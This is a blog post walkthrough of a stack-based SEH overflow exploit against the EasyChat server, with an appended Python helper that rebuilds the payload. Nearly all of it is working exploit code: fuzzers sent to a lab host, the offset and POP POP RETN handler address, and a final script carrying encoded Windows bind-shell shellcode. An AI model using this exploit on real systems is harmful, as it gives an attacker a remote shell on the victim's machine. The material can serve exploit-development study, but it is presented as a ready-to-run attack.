Wednesday, 22 February 2012

EXPLOIT EasyChat (SEH)

I.    INFORMATION GATHERING

While waiting for the Wireshark capture to finish, open the application.

Result of Wireshark (capture screenshot)


II. Service Enumeration

Port 80

SSL Port 443

III. Vulnerability Identification

GET /chatsubmit.ghp?username=heril&password=heril&room=1 HTTP/1.1
(captured with Wireshark). From this we know we can send the fuzzer to port 80 using the request GET /chat.ghp?username=heril&password=heril&room=1 HTTP/1.1, with the oversized input placed in the username parameter.



IV. Exploitation

1.    Making the Fuzzer

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes = b"\x90" * 30000                      # 30000 bytes of NOPs in the username parameter to trigger the crash
s.connect(('192.168.56.101', 80))
s.send(b"GET /chat.ghp?username=" + tes + b"&password=heri&room=1 HTTP/1.1\r\n\r\n")
print("============== >>")
s.close()

Run the fuzzer. When the application crashes, choose View > SEH chain in the debugger: the handler has been overwritten with our bytes.

Create a 30000-byte pattern with pattern_create 30000.


2.    Edit the Fuzzer

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes = b"your pattern_create"               # replace with the 30000-byte output of pattern_create
s.connect(('192.168.56.101', 80))
s.send(b"GET /chat.ghp?username=" + tes + b"&password=heri&room=1 HTTP/1.1\r\n\r\n")
print("============== >>")
s.close()

Run the fuzzer again. When the application crashes, choose View > SEH chain and note the 4-byte value that now sits in the handler.

Then look up that value in the pattern (pattern_offset) to get the distance from the start of the buffer to the SEH record; the offset used in the rest of this post is 216 bytes.


3. Search for a Module

Choose View > Executable modules
and select SSLEAY32.
Double-click it and follow the steps shown: we need a POP POP RETN sequence in this module to use as the SEH handler address.




4. Edit your Fuzzer

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes  = b"\x90" * 216                 # offset to the SEH record (from pattern_offset)
tes += b"\xEE\xEE\xEE\xEE"           # nSEH placeholder, easy to recognise in the debugger
tes += b"\xB6\xB2\x01\x10"           # SEH handler: 0x1001B2B6, POP POP RETN in SSLEAY32 (little-endian)
tes += b"\x90" * (30004 - len(tes))  # pad to the original crash length
s.connect(('192.168.56.101', 80))
s.send(b"GET /chat.ghp?username=" + tes + b"&password=heri&room=1 HTTP/1.1\r\n\r\n")
print("============== >>")
s.close()

Run the fuzzer again. When the application crashes, choose View > SEH chain, select the handler and press F2 to set a breakpoint on it,
then press Shift+F9 to pass the exception to the handler,
then press F7 three times to step through POP, POP, RETN.

Look at where execution lands after the POP POP RETN: it returns into the nSEH field, the four \xEE bytes.

Now edit the fuzzer.

Modules with bad values: 4, 5, 6, 7, C, 3 and F.
We will check whether the application's SSLEAY32 module also contains bad values.

Copy ssleay32.dll into /pentest/exploits/framework, then:

root@justview:/pentest/exploits/framework# ./msfpescan -i ssleay32.dll

No bad values were found, so we will use this module.

5. Create Shellcode & Edit your Fuzzer

Open your browser and choose Windows Bind Shell to generate the shellcode; the encoded payload below is the result.

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tes  = b"\x90" * 216                 # offset to the SEH record
tes += b"\xEB\x06\x90\x90"           # nSEH: jmp short +6, skips over the 4-byte handler address
tes += b"\xB6\xB2\x01\x10"           # SEH handler: 0x1001B2B6, POP POP RETN in SSLEAY32 (little-endian)
tes += b"\x90" * 16                  # small NOP sled the jump lands in
tes += (b"\x33\xc9\xb1\x51\xda\xcb\xb8\xa7\x84\x38\x6a\xd9\x74\x24\xf4\x5b"   # encoded Windows bind shell
        b"\x31\x43\x13\x03\x43\x13\x83\x4c\x78\xda\x9f\x6e\xeb\xf0\x2d\x66"
        b"\x15\xf9\x51\x89\x86\x8d\xc2\x51\x63\x19\x5f\xa5\xe0\x61\x65\xad"
        b"\xf7\x76\xee\x02\xe0\x03\xae\xbc\x11\xff\x18\x37\x25\x74\x9b\xa9"
        b"\x77\x4a\x05\x99\xfc\x8a\x42\xe6\x3d\xc0\xa6\xe9\x7f\x3e\x4c\xd2"
        b"\x2b\xe5\x85\x51\x31\x6e\x8a\xbd\xb8\x9a\x53\x36\xb6\x17\x17\x17"
        b"\xdb\xa6\xcc\xa4\xcf\x23\x9b\xc6\x2b\x28\xfd\xd5\x05\x8b\x99\x52"
        b"\x26\x1b\xe9\x24\xa5\xd0\x9d\xb8\x18\x6d\x1d\xc8\x3c\x1a\x10\x86"
        b"\xce\x36\x7c\xe9\x19\xa0\x2e\x73\xce\x1e\xe3\x13\x79\x12\x31\xbc"
        b"\xd1\x2b\xe5\x2a\x11\x3e\xfa\x91\xf5\x3e\xd5\xba\x7c\x25\xbc\xc5"
        b"\x92\xae\x43\x90\x06\xad\xbc\xca\xbf\x68\x4b\x1f\x92\xdc\xb3\x09"
        b"\xbe\xb1\x18\xe6\x12\x75\xcc\x4b\xc6\x86\x22\x2d\x80\x69\x9f\xd7"
        b"\x03\x03\xfe\x82\xcc\xb7\x1b\xdc\xcb\xef\xe4\xca\xbe\x1f\x4a\xa7"
        b"\xc1\xf0\x04\xe3\x93\xdf\x3d\xbc\x14\xc9\xed\x17\x14\x26\x79\x72"
        b"\xa3\x41\x33\x2b\xcb\x98\x94\x87\x67\x70\xea\xf7\x1b\x12\xf3\x8e"
        b"\xdd\x9a\xac\x8f\x34\x09\xac\xbf\xdf\xd8\x36\x59\x48\x7e\xda\x2c"
        b"\x6d\xea\x74\x77\x47\x27\xfd\x60\xfd\xf3\x77\x8c\x33\x3c\x74\xfa"
        b"\xca\xfe\x56\x04\x70\xd3\x3b\x75\x0f\x13\x97\x2e\x5b\x0b\x95\xce"
        b"\x2f\xda\xa6\x5b\x14\x1c\x8e\xf8\xc3\xb0\x7e\xaf\xba\x5e\x80\x1e"
        b"\x6c\xca\xd3\x5f\x5e\x9c\x7e\x46\x5a\x93\xd2\x87\xb3\x41\x2a\x88"
        b"\x0b\x69\x04\xfd\x23\x69\x26\xc5\xa8\x6e\xff\x97\xcf\x41\x68\x69"
        b"\xe8\x80\x1a\xc6\xf7\x93\x22\x38")
tes += b"\x90" * (30004 - len(tes))  # pad to the original crash length
s.connect(('192.168.56.101', 80))
s.send(b"GET /chat.ghp?username=" + tes + b"&password=heri&room=1 HTTP/1.1\r\n\r\n")
print("============== >>")
s.close()

Run the fuzzer again.
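As an added example (not code from the original post), the offset-finding step after the pattern fuzzer and the final payload layout in one script: a Metasploit-style pattern_create/pattern_offset reimplementation, and a builder for the SEH buffer with the values used above (216 bytes to nSEH, jmp short +6, POP POP RETN at 0x1001B2B6, 16 NOPs, 30004 bytes total) that also refuses bad characters. The bad-character set, the example SEH chain value 41326841 and the 8-byte INT3 stand-in for the shellcode are constructed assumptions.

```python
import socket
import string
import struct


# Metasploit-style cyclic pattern (default charsets). It repeats after
# 26*26*10*3 = 20280 bytes, so offsets beyond that are ambiguous.
def pattern_create(length):
    """Return a cyclic pattern of `length` bytes: Aa0Aa1Aa2...Ab0Ab1..."""
    triplets = [u + l + d
                for u in string.ascii_uppercase
                for l in string.ascii_lowercase
                for d in string.digits]
    cycle = "".join(triplets)
    reps = length // len(cycle) + 1
    return (cycle * reps)[:length].encode("ascii")


def pattern_offset(seh_value_hex, length=30000):
    """Offset in the pattern of the dword shown in the SEH chain.

    The debugger prints the overwritten handler as a little-endian dword
    (e.g. 41326841), so pack it back into memory order before searching.
    Returns -1 if the value is not part of the pattern.
    """
    needle = struct.pack("<I", int(seh_value_hex, 16))
    return pattern_create(length).find(needle)


# Bytes that would end or mangle the request line: NUL, LF, CR and space.
# Assumption for this example; the post's own shellcode contains '&' (0x26)
# and '=' (0x3d), so the server evidently copies the raw query string.
BAD_CHARS = b"\x00\x0a\x0d\x20"


def bad_chars_in(data, bad=BAD_CHARS):
    """Sorted list of the bad byte values that occur in `data`."""
    return sorted({b for b in data if b in bad})


# Layout from the post: 216 bytes to nSEH, nSEH = jmp short +6 (skips the
# 4-byte handler address), handler = POP POP RETN at 0x1001B2B6 in
# ssleay32.dll, 16 NOPs, shellcode, NOP padding up to 30004 bytes.
NSEH_JMP = b"\xEB\x06\x90\x90"


def build_seh_payload(shellcode, offset=216, seh_addr=0x1001B2B6,
                      nop_pad=16, total=30004, bad=BAD_CHARS):
    """Assemble the SEH overwrite buffer, refusing bad characters."""
    seh = struct.pack("<I", seh_addr)   # 0x1001B2B6 -> b"\xB6\xB2\x01\x10"
    if bad_chars_in(seh, bad):
        raise ValueError("handler address contains bad characters")
    if bad_chars_in(shellcode, bad):
        raise ValueError("shellcode contains bad characters")
    buf = b"\x90" * offset + NSEH_JMP + seh + b"\x90" * nop_pad + shellcode
    if len(buf) > total:
        raise ValueError("payload exceeds %d bytes" % total)
    return buf + b"\x90" * (total - len(buf))


def build_request(payload, path=b"/chat.ghp"):
    """The GET request the post's fuzzer sends, payload in `username`."""
    return (b"GET " + path + b"?username=" + payload +
            b"&password=heri&room=1 HTTP/1.1\r\n\r\n")


def send_request(host, port, data):
    """Deliver a request to the target (network I/O, not run by the demo)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.sendall(data)
    finally:
        s.close()


if __name__ == "__main__":
    # Step 2: send pattern_create(30000) instead of the NOPs and read the SEH
    # chain; the constructed example value 41326841 maps to offset 216.
    print("offset:", pattern_offset("41326841"))
    # Steps 4/5: final layout with an 8-byte stand-in (INT3s) for the shellcode.
    payload = build_seh_payload(b"\xCC" * 8)
    print("nSEH+SEH:", payload[216:224].hex())
    # To fire it: send_request("192.168.56.101", 80, build_request(payload))
```

pattern_offset packs the debugger's dword back into memory order before searching, which is why a value read off the SEH chain can be used directly; if it returns -1 the overwrite came from somewhere other than the pattern, or the offset lies past the 20280-byte repeat.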


GOOD LUCK

1 comment:

  1. Hi, where can I download Easy Chat Server 2 and 3?

    Thanks for answering and best regards